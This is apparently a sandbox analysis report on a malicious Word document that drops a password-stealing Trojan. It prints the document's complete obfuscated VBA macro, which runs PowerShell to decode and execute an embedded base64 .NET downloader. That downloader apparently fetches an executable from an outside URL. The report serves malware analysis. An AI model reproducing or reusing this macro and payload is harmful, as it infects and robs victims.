a2cdac36...103a | Files
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Trojan, Dropper, Downloader

a2cdac363d6497bba4790ac8b56664c9f8f07903583ac63b5f75419095cb103a (SHA256)

KargoBilgisi.doc

Word Document

Created at 2018-10-09 05:29:00

...

Notifications (2/2)

The overall sleep time of all monitored processes was truncated from "30 seconds" to "10 seconds" to reveal dormant functionality.

The operating system was rebooted during the analysis.

Filters:
Filename Category Type Severity Actions
C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe Created File Binary
Blacklisted
...
»
Also Known As C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe (Created File)
Mime Type application/x-dosexec
File Size 660.50 KB
MD5 db5e092d6ba44b4cd6d56525d26f77d5 Copy to Clipboard
SHA1 d099ffb84b70d417ab56e77938f006b66854f065 Copy to Clipboard
SHA256 aac6f556cdf12a9bdbd8c434185efb53dced35ba12139d2b04e605f90e35689a Copy to Clipboard
SSDeep 12288:H+OtcQvFRh50ViU8L1PW7ps7nvNlCzXZmoMSPlJuxRY1Ugz1/ZjRFwRJoEfIm:eODvzh5kiU8tjvvU/axmdRdRFwjocIm Copy to Clipboard
ImpHash f34d5f2d4577ed6d9ceec516c1f5a744 Copy to Clipboard
File Reputation Information
»
Severity
Blacklisted
First Seen 2018-10-08 15:49 (UTC+2)
Last Seen 2018-10-09 04:09 (UTC+2)
Names ByteCode-MSIL.Trojan.Passwordstealer
Families Passwordstealer
Classification Trojan
PE Information
»
Image Base 0x400000
Entry Point 0x49a5de
Size Of Code 0x98600
Size Of Initialized Data 0xc800
File Type executable
Subsystem windows_gui
Machine Type i386
Compile Timestamp 2018-10-08 09:08:40+00:00
Version Information (11)
»
Assembly Version 1.0.0.0
LegalCopyright Copyright © 2018
InternalName GostWell.exe
FileVersion 1.0.0.0
CompanyName MSBuild
LegalTrademarks MSBuild
Comments MSBuild
ProductName GostWell
ProductVersion 1.0.0.0
FileDescription MSBuild
OriginalFilename GostWell.exe
Sections (4)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x402000 0x985e4 0x98600 0x400 cnt_code, mem_execute, mem_read 7.93
.sdata 0x49c000 0x21a 0x400 0x98a00 cnt_initialized_data, mem_read, mem_write 4.3
.rsrc 0x49e000 0xc0b8 0xc200 0x98e00 cnt_initialized_data, mem_read 7.23
.reloc 0x4ac000 0xc 0x200 0xa5000 cnt_initialized_data, mem_discardable, mem_read 0.1
Imports (1)
»
mscoree.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
_CorExeMain 0x0 0x402000 0x9a5b8 0x989b8 0x0
Icons (1)
»
C:\Users\BGC6u8Oy yXGxkR\Desktop\KargoBilgisi.doc Sample File Word Document
Suspicious
...
»
Mime Type application/vnd.openxmlformats-officedocument.wordprocessingml.document
File Size 68.32 KB
MD5 5092f23f23c4287a0d813acbcf2fea0b Copy to Clipboard
SHA1 7810f8ccf283379d13f4c209863363eadf87769e Copy to Clipboard
SHA256 a2cdac363d6497bba4790ac8b56664c9f8f07903583ac63b5f75419095cb103a Copy to Clipboard
SSDeep 1536:dUBgxVKNuINXXP+uXEAOcdaXobhbaF6sTNksgZBH:0q6/NP+uXSyboTksgZBH Copy to Clipboard
Parser Error Remark Static analyzer was unable to completely parse the analyzed file
Office Information
»
Creator ExploitDb
Last Modified By ExploitDb
Revision 3
Create Time 2018-10-08 12:51:00+00:00
Modify Time 2018-10-08 12:52:00+00:00
Document Information
»
Application Microsoft Office Word
App Version 16.0000
Template Normal.dotm
Document Security SecurityFlag.NONE
Page Count 1
Line Count 1
Paragraph Count 1
Character Count 1
Chars With Spaces 1
ScaleCrop False
SharedDoc False
VBA Macros (1)
»
Macro #1: ThisDocument
» 
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_BuildingBlockInsert(ByVal Range As Range, ByVal Name As String, ByVal Category As String, ByVal BlockType As String, ByVal Template As String)

End Sub

Private Sub Document_Close()

End Sub

Private Sub Document_ContentControlAfterAdd(ByVal NewContentControl As ContentControl, ByVal InUndoRedo As Boolean)

End Sub

Private Sub Document_ContentControlOnExit(ByVal ContentControl As ContentControl, Cancel As Boolean)

End Sub

Private Sub Document_New()

End Sub

Private Sub Document_Open()
    Dim Arguments As String
    Arguments = ""
    Arguments = "[Byte[]]$code_ = [System.Convert]::FromBase64String('" + xPBFfSQK + "');" + "[Reflection.Assembly]::Load($code_).EntryPoint.Invoke($Null,$Null);"
    Call Load(Arguments)
End Sub
Private Sub Load(Arguments As String)
    If (33 > 13) Then
    If (33 > 13) Then
    If (33 > 13) Then
    If (33 > 13) Then
    If (33 > 13) Then
    If (33 > 13) Then
    If (33 > 13) Then
    If (33 > 13) Then
    If (33 > 13) Then
    If (33 > 13) Then
    If (33 > 13) Then
    If (33 > 13) Then
    If (33 > 13) Then
    If (33 > 13) Then
    If (33 > 13) Then
    If (33 > 13) Then
    Set objShell = VBA.CreateObject(U0VFzrjFo("1%&e'*8", "fBFTjwwKL"))
    objShell.Run z4RJhjKuX("#*+1.P(?k6biVd", "SErNcBF5D") & Arguments, 0, True
    End If
    End If
    End If
    End If
    End If
    End If
    End If
    End If
    End If
    End If
    End If
    End If
    End If
    End If
    End If
    End If

End Sub
Public Function z4RJhjKuX(ByVal scdNpU6gN As String, ByVal fLiVLN3ny As String) As String
Dim sXN7pJl7E As Long
    For sXN7pJl7E = 1 To Len(scdNpU6gN)
        z4RJhjKuX = z4RJhjKuX & Chr(Asc(Mid(fLiVLN3ny, IIf(sXN7pJl7E Mod Len(fLiVLN3ny) <> 0, sXN7pJl7E Mod Len(fLiVLN3ny), Len(fLiVLN3ny)), 1)) Xor Asc(Mid(scdNpU6gN, sXN7pJl7E, 1)))
    Next sXN7pJl7E
End Function
Public Function U0VFzrjFo(ByVal qdCPQ8BNr As String, ByVal zF5qNTEas As String) As String
Dim phRVFlxsF As Long
    For phRVFlxsF = 1 To Len(qdCPQ8BNr)
        U0VFzrjFo = U0VFzrjFo & Chr(Asc(Mid(zF5qNTEas, IIf(phRVFlxsF Mod Len(zF5qNTEas) <> 0, phRVFlxsF Mod Len(zF5qNTEas), Len(zF5qNTEas)), 1)) Xor Asc(Mid(qdCPQ8BNr, phRVFlxsF, 1)))
    Next phRVFlxsF
End Function
Public Function xPBFfSQK() As String
xPBFfSQK = "T]V]q]Q]A]A]M]A]A]A]A]E]A]A]A]A]/]/]8]A]A]L]g]A]A]A]A]A]A]A]A]A]Q]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]g]A]A]A]A]A]4]f]u]g]4]A]t]A]n]N]I]b]g]B]T]M]0]h]V]G]h]p]c]y]B]w]c]m]9]n]c]m]F]t]I]G]N]h]b]m]5]v]d]C]B]i]Z]S]B]y]d]W]4]g]a]W]4]g]R]E]9]T]I]G]1]v]Z]G]U]u]D]Q]0]K]J]A]A]A]A]A]A]A]A]A]B]Q]R]Q]A]A]T]A]E]D]A]P]p]R]u]1]s]A]A]A]A]A]A]A]A]A]A]O]A]A]I]g]A]L]A]T]A]A]A]B]A]A]A]A]A]I]A]A]A]A]A]A]A]A]b]i]8]A]A]A]A]g]A]A]A]A]Q]A]A]A]A]A]B]A]A]A]A]g]A]A]A]A]A]g]A]A]B]A]A]A]A]A]A]A]A]A]A]E]A]A]A]A]A]A]A]A]A]A]C]A]A]A]A]A]A]g]A]A]A]A]A]A]A]A]I]A]Q]I]U]A]A]B]A]A]A]B]A]A]A]A]A]"
xPBFfSQK = xPBFfSQK & "A]E]A]A]A]E]A]A]A]A]A]A]A]A]B]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]B]w]v]A]A]B]P]A]A]A]A]A]E]A]A]A]K]w]F]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]G]A]A]A]A]w]A]A]A]D]k]L]Q]A]A]H]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]I]A]A]A]C]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]C]C]A]A]A]E]g]A]A]A]A]A]A]A]A]A]A]A]A]A]A]C]5]0]Z]X]h]0]A]A]A]A]d]A]8]A]A]A]A]g]A]A]A]A]E]A]A]A]A]A]I]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]C]A]A]A]G]A]u]c]n]N]y]Y]w]A]A]A]K]w]F]A]A]A]A]Q]A]A]A]A]A]Y]A]A]A]A]S]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]B]A]A]A]B]A]L]n]J]l]b]G]9]j]A]A]A]M]A]A]"
xPBFfSQK = xPBFfSQK & "A]A]A]G]A]A]A]A]A]C]A]A]A]A]G]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]Q]A]A]A]Q]g]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]B]Q]L]w]A]A]A]A]A]A]A]E]g]A]A]A]A]C]A]A]U]A]L]C]E]A]A]A]A]M]A]A]A]B]A]A]A]A]A]w]A]A]B]i]w]t]A]A]C]4]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]B]p]+]A]Q]A]A]B]C]o]e]A]o]A]B]A]A]A]E]K]g]A]b]M]A]M]A]L]w]A]A]A]A]A]A]A]A]B]z]E]w]A]A]C]n]I]B]A]A]B]w]K]A]E]A]A]A]Z]v]F]A]A]A]C]i]A]Q]J]w]A]A]K]B]U]A]A]A]o]o]A]Q]A]A]B]i]g]W]A]A]A]K]J]t]4]D]J]t]4]A]K]g]A]B]E]A]A]A]A]A]A]A]A]C]s]r]A]A]M]S]A]A]A]B]W]h]0]o]F]w]A]A]C]n]J]r]A]A]B]w]K]B]g]A]A]"
xPBFfSQK = xPBFfSQK & "A]q]A]A]Q]A]A]B]C]o]e]A]i]g]Z]A]A]A]K]K]q]5]+]A]g]A]A]B]C]0]e]c]o]U]A]A]H]D]Q]A]w]A]A]A]i]g]a]A]A]A]K]b]x]s]A]A]A]p]z]H]A]A]A]C]o]A]C]A]A]A]E]f]g]I]A]A]A]Q]q]G]n]4]D]A]A]A]E]K]h]4]C]g]A]M]A]A]A]Q]q]G]n]4]E]A]A]A]E]K]h]4]C]K]B]0]A]A]A]o]q]V]n]M]K]A]A]A]G]K]B]4]A]A]A]p]0]B]A]A]A]A]o]A]E]A]A]A]E]K]g]B]C]U]0]p]C]A]Q]A]B]A]A]A]A]A]A]A]M]A]A]A]A]d]j]I]u]M]C]4]1]M]D]c]y]N]w]A]A]A]A]A]F]A]G]w]A]A]A]D]8]A]w]A]A]I]3]4]A]A]G]g]E]A]A]D]k]B]A]A]A]I]1]N]0]c]m]l]u]Z]3]M]A]A]A]A]A]T]A]k]A]A]M]Q]A]A]A]A]j]V]V]M]A]E]A]o]A]A]B]A]A]A]A]A]j]R]1]V]J]R]A]A]A]A]C]A]K]A]A]D]g]A]Q]A]A]I]0]J]s]b]2]I]A]A]A]A]A]A]A]A]A]A]g]A]A]A]V]c]V]o]A]E]J]"
xPBFfSQK = xPBFfSQK & "A]Q]A]A]A]P]o]B]M]w]A]W]A]A]A]B]A]A]A]A]I]w]A]A]A]A]Q]A]A]A]A]E]A]A]A]A]C]w]A]A]A]A]I]A]A]A]A]e]A]A]A]A]G]A]A]A]A]A]M]A]A]A]A]E]A]A]A]A]B]g]A]A]A]A]E]A]A]A]A]C]A]A]A]A]A]Q]A]A]A]A]A]A]s]g]I]B]A]A]A]A]A]A]A]G]A]C]E]C]B]g]Q]G]A]I]4]C]B]g]Q]G]A]F]U]B]1]A]M]P]A]F]8]E]A]A]A]G]A]J]Y]B]X]w]M]G]A]A]Q]C]X]w]M]G]A]O]U]B]X]w]M]G]A]H]U]C]X]w]M]G]A]E]E]C]X]w]M]G]A]F]o]C]X]w]M]G]A]K]0]B]X]w]M]G]A]I]I]B]5]w]M]G]A]B]M]B]5]w]M]G]A]M]g]B]X]w]M]G]A]J]o]E]H]Q]M]G]A]P]g]A]B]g]Q]G]A]O]U]A]H]Q]M]G]A]H]E]D]H]Q]M]K]A]C]E]B]r]w]M]G]A]D]g]B]1]A]M]G]A]J]8]D]J]g]Q]G]A]H]s]D]S]g]M]K]A]N]A]A]/]w]I]K]A]G]k]B]/]w]I]K]A]L]g]A]N]Q]M]K]A]L]g]E]o]Q]Q]"
xPBFfSQK = xPBFfSQK & "G]A]B]M]A]v]w]I]K]A]I]s]E]1]A]M]G]A]M]I]E]H]Q]N]3]A]I]0]D]A]A]A]G]A]N]A]C]H]Q]M]G]A]I]s]A]H]Q]M]G]A]F]o]A]H]Q]M]G]A]N]g]E]X]w]M]K]A]M]M]A]N]Q]M]A]A]A]A]A]A]Q]A]A]A]A]A]A]A]Q]A]B]A]I]A]B]E]A]A]V]A]x]o]A]P]Q]A]B]A]A]E]A]A]A]A]Q]A]C]0]E]b]g]Q]9]A]A]I]A]B]Q]A]A]A]R]A]A]g]g]R]u]B]G]U]A]B]A]A]J]A]B]E]A]M]A]B]m]A]B]E]A]J]A]N]p]A]B]E]A]q]A]B]t]A]B]E]A]S]g]B]x]A]F]A]g]A]A]A]A]A]J]E]I]5]Q]J]1]A]A]E]A]V]y]A]A]A]A]A]A]k]Q]j]y]A]n]k]A]A]Q]B]g]I]A]A]A]A]A]C]R]A]D]A]D]f]g]A]C]A]K]w]g]A]A]A]A]A]J]E]Y]z]Q]N]+]A]A]I]A]w]y]A]A]A]A]A]A]g]x]j]H]A]w]Y]A]A]g]D]L]I]A]A]A]A]A]C]T]C]J]s]D]g]g]A]C]A]P]c]g]A]A]A]A]A]J]M]I]k]A]C]H]A]A]I]A]/]i]"
xPBFfSQK = xPBFfSQK & "A]A]A]A]A]A]k]w]i]c]A]I]w]A]A]g]A]G]I]Q]A]A]A]A]C]W]C]K]w]E]k]g]A]D]A]A]0]h]A]A]A]A]A]I]Y]Y]x]w]M]G]A]A]M]A]F]S]E]A]A]A]A]A]k]R]j]N]A]3]4]A]A]w]A]A]A]A]E]A]r]A]I]A]A]A]E]A]r]A]I]J]A]M]c]D]A]Q]A]R]A]M]c]D]B]g]A]Z]A]M]c]D]C]g]A]p]A]M]c]D]E]A]A]x]A]M]c]D]E]A]A]5]A]M]c]D]E]A]B]B]A]M]c]D]E]A]B]J]A]M]c]D]E]A]B]R]A]M]c]D]E]A]B]Z]A]M]c]D]E]A]B]h]A]M]c]D]F]Q]B]p]A]M]c]D]E]A]B]x]A]M]c]D]E]A]C]B]A]M]c]D]B]g]C]J]A]M]c]D]B]g]C]Z]A]M]c]D]G]g]C]h]A]M]c]D]B]g]D]B]A]M]c]D]I]A]D]R]A]M]c]D]B]g]D]R]A]H]4]A]G]g]D]Z]A]I]c]D]J]g]D]h]A]M]4]E]K]w]D]p]A]N]c]C]M]Q]D]5]A]J]M]E]N]w]B]5]A]M]c]D]B]g]A]B]A]W]w]A]P]Q]A]B]A]d]Q]E]R]g]C]p]A]M]c]D]T]"
xPBFfSQK = xPBFfSQK & "A]D]J]A]M]c]D]B]g]A]Z]A]S]M]A]V]A]A]g]A]H]M]A]P]g]E]h]A]H]M]A]P]g]E]u]A]A]s]A]q]g]A]u]A]B]M]A]s]w]A]u]A]B]s]A]0]g]A]u]A]C]M]A]2]w]A]u]A]C]s]A]6]Q]A]u]A]D]M]A]6]Q]A]u]A]D]s]A]6]Q]A]u]A]E]M]A]2]w]A]u]A]E]s]A]7]w]A]u]A]F]M]A]6]Q]A]u]A]F]s]A]6]Q]A]u]A]G]M]A]B]w]E]u]A]G]s]A]M]Q]F]A]A]H]M]A]P]g]F]J]A]J]M]A]0]g]B]g]A]H]s]A]P]g]F]j]A]I]M]A]Q]w]F]j]A]I]s]A]P]g]F]j]A]H]M]A]P]g]F]p]A]J]M]A]0]g]C]D]A]H]M]A]P]g]G]D]A]I]M]A]h]A]E]C]A]A]E]A]A]w]A]C]A]A]Q]A]B]A]A]A]A]P]Y]C]l]w]A]A]A]J]8]D]m]w]A]A]A]L]A]A]o]A]A]A]A]L]A]E]p]Q]A]C]A]A]E]A]A]w]A]B]A]A]I]A]A]w]A]C]A]A]Y]A]B]Q]A]C]A]A]c]A]B]w]A]B]A]A]g]A]B]w]A]C]A]A]k]A]C]Q]A]E]g]A]A]A]"
xPBFfSQK = xPBFfSQK & "A]Q]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]a]A]A]A]A]A]g]A]A]A]A]A]A]A]A]A]A]A]A]A]A]X]Q]A]K]A]A]A]A]A]A]A]C]A]A]A]A]A]A]A]A]A]A]A]A]A]A]B]d]A]B]0]D]A]A]A]A]A]A]A]A]A]A]A]B]A]A]A]A]N]w]Q]A]A]A]A]A]A]A]A]A]P]E]1]v]Z]H]V]s]Z]T]4]A]b]X]N]j]b]3]J]s]a]W]I]A]V]G]h]y]Z]W]F]k]A]E]R]v]d]2]5]s]b]2]F]k]A]F]N]5]b]m]N]o]c]m]9]u]a]X]p]l]Z]A]A]8]R]G]V]z]d]F]B]h]d]G]g]+]a]1]9]f]Q]m]F]j]a]2]l]u]Z]0]Z]p]Z]W]x]k]A]G]R]l]Z]m]F]1]b]H]R]J]b]n]N]0]Y]W]5]j]Z]Q]B]S]d]W]5]0]a]W]1]l]V]H]l]w]Z]U]h]h]b]m]R]s]Z]Q]B]H]Z]X]R]U]e]X]B]l]R]n]J]v]b]U]h]h]b]m]R]s]Z]Q]B]E]b]3]d]u]b]G]9]h]Z]E]Z]p]b]G]U]A]V]H]l]w]Z]Q]B]n]Z]X]R]f]Q]3]V]s]d]H]V]y]Z]Q]B]z]Z]X]R]"
xPBFfSQK = xPBFfSQK & "f]Q]3]V]s]d]H]V]y]Z]Q]B]y]Z]X]N]v]d]X]J]j]Z]U]N]1]b]H]R]1]c]m]U]A]Q]X]B]w]b]G]l]j]Y]X]R]p]b]2]5]T]Z]X]R]0]a]W]5]n]c]0]J]h]c]2]U]A]R]W]R]p]d]G]9]y]Q]n]J]v]d]3]N]h]Y]m]x]l]U]3]R]h]d]G]U]A]U]1]R]B]V]G]h]y]Z]W]F]k]Q]X]R]0]c]m]l]i]d]X]R]l]A]E]N]v]b]X]B]p]b]G]V]y]R]2]V]u]Z]X]J]h]d]G]V]k]Q]X]R]0]c]m]l]i]d]X]R]l]A]E]d]1]a]W]R]B]d]H]R]y]a]W]J]1]d]G]U]A]R]2]V]u]Z]X]J]h]d]G]V]k]Q]2]9]k]Z]U]F]0]d]H]J]p]Y]n]V]0]Z]Q]B]E]Z]W]J]1]Z]2]d]l]c]k]5]v]b]l]V]z]Z]X]J]D]b]2]R]l]Q]X]R]0]c]m]l]i]d]X]R]l]A]E]R]l]Y]n]V]n]Z]2]F]i]b]G]V]B]d]H]R]y]a]W]J]1]d]G]U]A]R]W]R]p]d]G]9]y]Q]n]J]v]d]3]N]h]Y]m]x]l]Q]X]R]0]c]m]l]i]d]X]R]l]A]E]N]v]b]V]Z]p]c]2]"
xPBFfSQK = xPBFfSQK & "l]i]b]G]V]B]d]H]R]y]a]W]J]1]d]G]U]A]Q]X]N]z]Z]W]1]i]b]H]l]U]a]X]R]s]Z]U]F]0]d]H]J]p]Y]n]V]0]Z]Q]B]B]c]3]N]l]b]W]J]s]e]V]R]y]Y]W]R]l]b]W]F]y]a]0]F]0]d]H]J]p]Y]n]V]0]Z]Q]B]B]c]3]N]l]b]W]J]s]e]U]Z]p]b]G]V]W]Z]X]J]z]a]W]9]u]Q]X]R]0]c]m]l]i]d]X]R]l]A]E]F]z]c]2]V]t]Y]m]x]5]Q]2]9]u]Z]m]l]n]d]X]J]h]d]G]l]v]b]k]F]0]d]H]J]p]Y]n]V]0]Z]Q]B]B]c]3]N]l]b]W]J]s]e]U]R]l]c]2]N]y]a]X]B]0]a]W]9]u]Q]X]R]0]c]m]l]i]d]X]R]l]A]E]N]v]b]X]B]p]b]G]F]0]a]W]9]u]U]m]V]s]Y]X]h]h]d]G]l]v]b]n]N]B]d]H]R]y]a]W]J]1]d]G]U]A]Q]X]N]z]Z]W]1]i]b]H]l]Q]c]m]9]k]d]W]N]0]Q]X]R]0]c]m]l]i]d]X]R]l]A]E]F]z]c]2]V]t]Y]m]x]5]Q]2]9]w]e]X]J]p]Z]2]h]0]Q]X]R]0]c]m]l]i]d]"
xPBFfSQK = xPBFfSQK & "X]R]l]A]E]F]z]c]2]V]t]Y]m]x]5]Q]2]9]t]c]G]F]u]e]U]F]0]d]H]J]p]Y]n]V]0]Z]Q]B]S]d]W]5]0]a]W]1]l]Q]2]9]t]c]G]F]0]a]W]J]p]b]G]l]0]e]U]F]0]d]H]J]p]Y]n]V]0]Z]Q]B]2]Y]W]x]1]Z]Q]B]E]b]3]d]u]b]G]9]h]Z]C]5]l]e]G]U]A]U]3]l]z]d]G]V]t]L]l]R]o]c]m]V]h]Z]G]l]u]Z]w]B]T]d]H]J]p]b]m]c]A]R]2]V]0]R]m]9]s]Z]G]V]y]U]G]F]0]a]A]B]n]Z]X]R]f]R]G]V]z]d]F]B]h]d]G]g]A]c]2]V]0]X]0]R]l]c]3]R]Q]Y]X]R]o]A]F]N]5]c]3]R]l]b]S]5]D]b]2]1]w]b]2]5]l]b]n]R]N]b]2]R]l]b]A]B]Q]c]m]9]n]c]m]F]t]A]F]N]5]c]3]R]l]b]Q]B]y]Z]X]N]v]d]X]J]j]Z]U]1]h]b]g]B]N]Y]W]l]u]A]F]N]5]c]3]R]l]b]S]5]D]b]2]5]m]a]W]d]1]c]m]F]0]a]W]9]u]A]F]N]5]c]3]R]l]b]S]5]H]b]G]9]i]Y]W]x]p]e]m]F]0]"
xPBFfSQK = xPBFfSQK & "a]W]9]u]A]F]N]5]c]3]R]l]b]S]5]S]Z]W]Z]s]Z]W]N]0]a]W]9]u]A]E]V]4]Y]2]V]w]d]G]l]v]b]g]B]D]d]W]x]0]d]X]J]l]S]W]5]m]b]w]B]T]b]G]V]l]c]A]B]T]c]G]V]j]a]W]F]s]R]m]9]s]Z]G]V]y]A]G]d]l]d]F]9]S]Z]X]N]v]d]X]J]j]Z]U]1]h]b]m]F]n]Z]X]I]A]U]3]l]z]d]G]V]t]L]k]N]v]Z]G]V]E]b]2]0]u]Q]2]9]t]c]G]l]s]Z]X]I]A]L]m]N]0]b]3]I]A]L]m]N]j]d]G]9]y]A]F]N]5]c]3]R]l]b]S]5]E]a]W]F]n]b]m]9]z]d]G]l]j]c]w]B]T]e]X]N]0]Z]W]0]u]U]n]V]u]d]G]l]t]Z]S]5]J]b]n]R]l]c]m]9]w]U]2]V]y]d]m]l]j]Z]X]M]A]U]3]l]z]d]G]V]t]L]l]J]1]b]n]R]p]b]W]U]u]Q]2]9]t]c]G]l]s]Z]X]J]T]Z]X]J]2]a]W]N]l]c]w]B]T]e]X]N]0]Z]W]0]u]U]m]V]z]b]3]V]y]Y]2]V]z]A]E]R]v]d]2]5]s]b]2]F]k]L]l]B]y]b]3]B]"
xPBFfSQK = xPBFfSQK & "l]c]n]R]p]Z]X]M]u]U]m]V]z]b]3]V]y]Y]2]V]z]L]n]J]l]c]2]9]1]c]m]N]l]c]w]B]E]Z]W]J]1]Z]2]d]p]b]m]d]N]b]2]R]l]c]w]B]E]b]3]d]u]b]G]9]h]Z]C]5]Q]c]m]9]w]Z]X]J]0]a]W]V]z]A]F]N]l]d]H]R]p]b]m]d]z]A]F]B]y]b]2]N]l]c]3]M]A]Q]2]9]u]Y]2]F]0]A]E]9]i]a]m]V]j]d]A]B]T]e]X]N]0]Z]W]0]u]T]m]V]0]A]G]d]l]d]F]9]E]Z]W]Z]h]d]W]x]0]A]F]d]l]Y]k]N]s]a]W]V]u]d]A]B]F]b]n]Z]p]c]m]9]u]b]W]V]u]d]A]B]T]d]G]F]y]d]A]B]n]Z]X]R]f]Q]X]N]z]Z]W]1]i]b]H]k]A]A]A]A]A]A]G]l]o]A]H]Q]A]d]A]B]w]A]D]o]A]L]w]A]v]A]G]E]A]c]g]B]h]A]H]M]A]a]w]B]h]A]H]I]A]Z]w]B]v]A]C]0]A]b]w]B]u]A]G]w]A]a]Q]B]u]A]G]U]A]L]g]B]o]A]G]8]A]c]w]B]0]A]C]8]A]Z]g]B]h]A]G]0]A]a]Q]B]s]A]H]k]A]c]A]"
xPBFfSQK = xPBFfSQK & "B]p]A]G]M]A]d]A]B]1]A]H]I]A]Z]Q]B]z]A]C]8]A]Y]Q]B]y]A]G]E]A]c]w]A]u]A]G]U]A]e]A]B]l]A]A]E]Z]X]A]B]N]A]F]M]A]Q]g]B]1]A]G]k]A]b]A]B]k]A]C]4]A]Z]Q]B]4]A]G]U]A]A]D]t]E]A]G]8]A]d]w]B]u]A]G]w]A]b]w]B]h]A]G]Q]A]L]g]B]Q]A]H]I]A]b]w]B]w]A]G]U]A]c]g]B]0]A]G]k]A]Z]Q]B]z]A]C]4]A]U]g]B]l]A]H]M]A]b]w]B]1]A]H]I]A]Y]w]B]l]A]H]M]A]A]A]A]A]A]J]N]R]Q]1]o]z]H]8]R]A]s]q]9]C]m]J]G]M]Q]n]w]A]B]C]A]B]A]Q]g]D]I]A]A]B]B]S]A]B]A]R]E]R]B]C]A]B]A]Q]4]E]I]A]E]B]A]g]U]g]A]g]E]O]D]g]U]g]A]Q]E]R]X]Q]Q]A]A]Q]E]I]B]Q]A]B]E]n]E]O]B]Q]A]B]D]h]F]5]B]Q]A]C]D]g]4]O]C]A]A]B]E]o]C]B]E]Y]C]F]B]S]A]A]E]o]C]J]B]y]A]C]A]Q]4]S]g]I]k]I]A]A]E]S]g]I]0]S]g]I]0]I]t]"
xPBFfSQK = xPBFfSQK & "3]p]c]V]h]k]0]4]I]k]C]B]g]4]D]B]h]J]V]A]w]Y]S]W]Q]M]G]E]h]A]D]A]A]A]O]B]A]A]B]A]Q]4]D]A]A]A]B]B]A]A]A]E]l]U]E]A]A]A]S]W]Q]U]A]A]Q]E]S]W]Q]Q]A]A]B]I]Q]A]w]g]A]D]g]Q]I]A]B]J]V]B]A]g]A]E]l]k]E]C]A]A]S]E]A]g]B]A]A]g]A]A]A]A]A]A]B]4]B]A]A]E]A]V]A]I]W]V]3]J]h]c]E]5]v]b]k]V]4]Y]2]V]w]d]G]l]v]b]l]R]o]c]m]9]3]c]w]E]I]A]Q]A]C]A]A]A]A]A]A]A]N]A]Q]A]I]R]G]9]3]b]m]x]v]Y]W]Q]A]A]A]U]B]A]A]A]A]A]B]c]B]A]B]J]D]b]3]B]5]c]m]l]n]a]H]Q]g]w]q]k]g]I]D]I]w]M]T]g]A]A]C]k]B]A]C]Q]x]Z]G]J]l]M]z]Y]1]O]S]0]0]N]m]V]j]L]T]R]k]O]G]I]t]O]D]Q]w]M]C]0]2]M]z]V]i]N]W]I]z]Z]D]Y]3]N]G]Q]A]A]A]w]B]A]A]c]x]L]j]A]u]M]C]4]w]A]A]A]E]A]Q]A]A]A]E]A]B]A]D]N]T]"
xPBFfSQK = xPBFfSQK & "e]X]N]0]Z]W]0]u]U]m]V]z]b]3]V]y]Y]2]V]z]L]l]R]v]b]2]x]z]L]l]N]0]c]m]9]u]Z]2]x]5]V]H]l]w]Z]W]R]S]Z]X]N]v]d]X]J]j]Z]U]J]1]a]W]x]k]Z]X]I]H]N]C]4]w]L]j]A]u]M]A]A]A]W]Q]E]A]S]0]1]p]Y]3]J]v]c]2]9]m]d]C]5]W]a]X]N]1]Y]W]x]T]d]H]V]k]a]W]8]u]R]W]R]p]d]G]9]y]c]y]5]T]Z]X]R]0]a]W]5]n]c]0]R]l]c]2]l]n]b]m]V]y]L]l]N]l]d]H]R]p]b]m]d]z]U]2]l]u]Z]2]x]l]R]m]l]s]Z]U]d]l]b]m]V]y]Y]X]R]v]c]g]g]x]M]S]4]w]L]j]A]u]M]A]A]A]A]A]C]0]A]A]A]A]z]s]r]v]v]g]E]A]A]A]C]R]A]A]A]A]b]F]N]5]c]3]R]l]b]S]5]S]Z]X]N]v]d]X]J]j]Z]X]M]u]U]m]V]z]b]3]V]y]Y]2]V]S]Z]W]F]k]Z]X]I]s]I]G]1]z]Y]2]9]y]b]G]l]i]L]C]B]W]Z]X]J]z]a]W]9]u]P]T]I]u]M]C]4]w]L]j]A]s]I]E]N]1]b]H]R]"
